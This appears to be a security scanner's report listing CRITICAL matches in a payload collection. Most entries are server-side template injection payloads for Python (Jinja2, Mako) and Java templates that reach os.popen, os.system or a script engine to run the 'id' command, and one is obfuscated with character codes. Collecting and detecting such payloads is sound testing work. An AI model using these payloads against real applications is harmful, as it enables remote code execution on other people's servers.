| CRITICAL | Server Side Template Injection/Python.md | 226 | {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} |
| CRITICAL | Server Side Template Injection/Python.md | 227 | {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} |
| CRITICAL | Server Side Template Injection/Python.md | 228 | {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} |
| CRITICAL | Server Side Template Injection/Python.md | 379 | ${self.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 380 | ${self.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 381 | ${self.template.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 382 | ${self.module.cache.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 384 | ${self.template.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 385 | ${self.module.filters.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 386 | ${self.module.runtime.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 387 | ${self.module.runtime.exceptions.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 389 | ${self.module.cache.util.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 390 | ${self.module.runtime.util.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 391 | ${self.template._mmarker.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 392 | ${self.template.module.cache.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 393 | ${self.module.cache.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 394 | ${self.template._mmarker.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 395 | ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 396 | ${self.template.module.filters.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 397 | ${self.template.module.runtime.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 398 | ${self.module.filters.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 399 | ${self.module.runtime.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 400 | ${self.template.module.runtime.exceptions.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 401 | ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 402 | ${self.context._with_template.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 403 | ${self.module.runtime.exceptions.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 404 | ${self.template.module.cache.util.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 405 | ${self.context._with_template.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 406 | ${self.module.cache.util.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 407 | ${self.template.module.runtime.util.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 408 | ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 409 | ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 410 | ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 411 | ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 412 | ${self.template.module.cache.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 413 | ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 414 | ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 415 | ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 416 | ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 417 | ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 418 | ${self.template.module.filters.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 419 | ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 420 | ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 421 | ${self.context._with_template._mmarker.module.cache.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 422 | ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 423 | ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 424 | ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 425 | ${self.context._with_template.module.cache.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 426 | ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 427 | ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 428 | ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 429 | ${self.context._with_template.module.filters.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 430 | ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 431 | ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 432 | ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} |
| CRITICAL | Server Side Template Injection/Python.md | 293 | {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]). |
| CRITICAL | Server Side Template Injection/Python.md | 449 | ${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} |
| CRITICAL | Server Side Template Injection/Java.md | 171 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=ne |
| CRITICAL | Server Side Template Injection/Java.md | 173 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=ne |
| CRITICAL | .github/hopla_config.json | 839 | "value": "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}" |
| 1 more matches not shown… |